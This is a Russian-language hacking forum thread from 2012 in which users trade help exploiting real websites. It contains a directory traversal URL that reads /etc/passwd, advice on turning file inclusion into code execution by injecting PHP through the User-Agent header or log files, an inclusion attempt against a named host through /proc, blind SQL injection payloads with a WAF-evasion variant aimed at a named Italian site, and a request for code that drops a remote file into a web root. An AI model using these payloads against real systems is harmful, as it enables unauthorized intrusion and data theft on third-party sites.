ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.09.2012, 16:43
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Здравствуйте нашел Directory Traversal
http://site.ru/download.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2 f..%2f..%2f..%2f..%2fetc%2fpasswd - файл отлично выводиться, что делать дальше? Что можно из этого извлеч? Ранчше с этим не сталкивался
|
|
|
15.09.2012, 18:33
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от kacergei
kacergei said:
Здравствуйте нашел Directory Traversal
http://site.ru/download.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2 f..%2f..%2f..%2f..%2fetc%2fpasswd - файл отлично выводиться, что делать дальше? Что можно из этого извлеч? Ранчше с этим не сталкивался
Вопервых можешь поискать логи ошибок, спровацировать ошибку вставив в нее свой пхп код и проинклудить, во вторых если проинклудидится такая херь /proc/self/environ, то можешь также в хидерах отправить запрос с уже твоим пхп кодом, например в название браузера.
|
|
|
|
15.09.2012, 18:58
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Сообщение от winstrool
winstrool said:
Вопервых можешь поискать логи ошибок, спровацировать ошибку вставив в нее свой пхп код и проинклудить, во вторых если проинклудидится такая херь /proc/self/environ, то можешь также в хидерах отправить запрос с уже твоим пхп кодом, например в название браузера.
/proc/self/environ не инклудится, какие есть еще варианты?
И Как найти логи ошибок? (напиши в личку аську)
|
|
|
|
15.09.2012, 19:45
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от kacergei
kacergei said:
И Как найти логи ошибок?
Брутом по списку наиболее распространенных вариантов.
Если сайт на хостинге, читаешь инструкции и факи хостера или регаешь там же свой сайт, чтобы узнать стандартные имена лог-файлов.
|
|
|
|
18.09.2012, 08:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
28262
Репутация:
23
|
|
Сообщение от kacergei
kacergei said:
/proc/self/environ не инклудится, какие есть еще варианты?
И Как найти логи ошибок? (напиши в личку аську)
Тема for you - /thread324564.html.
Еще есть вариант с ftp логами.
|
|
|
|
19.09.2012, 15:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
28262
Репутация:
23
|
|
Есть сайт LFI, логи Apache не нашел. Решил поискать в /proc. Вспомнил, что путь до логов знать не обязательно, а можно залится через символическую ссылку к этим самым логам, но надо знать идентификатор процесса и ярлык соответствующему файлу. Соответственно полез я в /proc/self/status:
Код:
Code:
Name: apache State: R (running) SleepAVG: 97% Tgid: 28857 Pid: 28857 PPid: 7349 TracerPid: 0 Uid: 65534 65534 65534 65534 Gid: 65534 65534 65534 65534 FDSize: 32 Groups: 65534 VmSize: 19128 kB VmLck: 0 kB VmRSS: 8676 kB VmData: 2440 kB VmStk: 84 kB VmExe: 488 kB VmLib: 13636 kB VmPTE: 24 kB Threads: 1 SigQ: 0/2048 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000080000000 SigIgn: 0000000000001200 SigCgt: 00000003844064eb CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000
Вижу PID: 28857. Пытаюсь залится: http://ozrics.dyndns.info/modules/page.php?id=../../../proc/28857/fd/2&cmd=phpinfo();
В этот момент у меня уже стоит user-agent:
Что делаю не так? |
|
|
|
19.09.2012, 18:50
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Zed0x
Zed0x said:
Есть сайт LFI, логи Apache не нашел. Решил поискать в /proc. Вспомнил, что путь до логов знать не обязательно, а можно залится через символическую ссылку к этим самым логам, но надо знать идентификатор процесса и ярлык соответствующему файлу. Соответственно полез я в /proc/self/status:
Код:
Code:
Name: apache State: R (running) SleepAVG: 97% Tgid: 28857 Pid: 28857 PPid: 7349 TracerPid: 0 Uid: 65534 65534 65534 65534 Gid: 65534 65534 65534 65534 FDSize: 32 Groups: 65534 VmSize: 19128 kB VmLck: 0 kB VmRSS: 8676 kB VmData: 2440 kB VmStk: 84 kB VmExe: 488 kB VmLib: 13636 kB VmPTE: 24 kB Threads: 1 SigQ: 0/2048 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000080000000 SigIgn: 0000000000001200 SigCgt: 00000003844064eb CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000
Вижу PID: 28857. Пытаюсь залится: http://ozrics.dyndns.info/modules/page.php?id=../../../proc/28857/fd/2&cmd=phpinfo();
В этот момент у меня
уже
стоит user-agent:
Что делаю не так? попробуй сначала вывести phpinfo() из user-agent минуя get переменную, возможно что-то напутал с PID.
|
|
|
|
20.09.2012, 02:31
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695
Репутация:
19
|
|
помогите докрутить блинд скулю..
Сообщение от None
www.informatoreagario.it/clickthrough.asp?IDbanner=-3681 OR (ascii(substring((system_user),1,1)) > 0)
сама уязвимость
написал скриптик (код позаимствовал из тэмпера) для версии и текучей БД:
MS SQL 2005 и база 'InformatoreAgrario'
терь хочу выбрать таблицы в текщей базе, но почему-то не получается =/
Сообщение от None
-3681 OR (ascii(substring((SELECT count(name) FROM InformatoreAgrario..sysobjects),1,1)) > 0)
havji на эту багу вообще никак не реагирует, видимо работать с OR ее не научили |
|
|
|
20.09.2012, 07:58
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Pangolin PRO отлично справляется с MSSQL инъекциями.
Version = Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86) Dec 10 2010 10:56:29 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
User= webuser
Database = InformatoreAgrario
Но в твоём случае извлечению табличек мешает WAF.
[CODE]
Code:
http://www.informatoreagrario.it/clickthrough.asp?IDbanner=244%09and%09(select%09le n(cast(count(1)%09as%09varchar(10)))%09from%09[informatoreagrario]..[sysobjects]%09where%09xtype=char(85)%09and%09status>0)>88%09a nd%091
|
|
|
|
20.09.2012, 14:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в
/var/www/htdocs/images/ ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
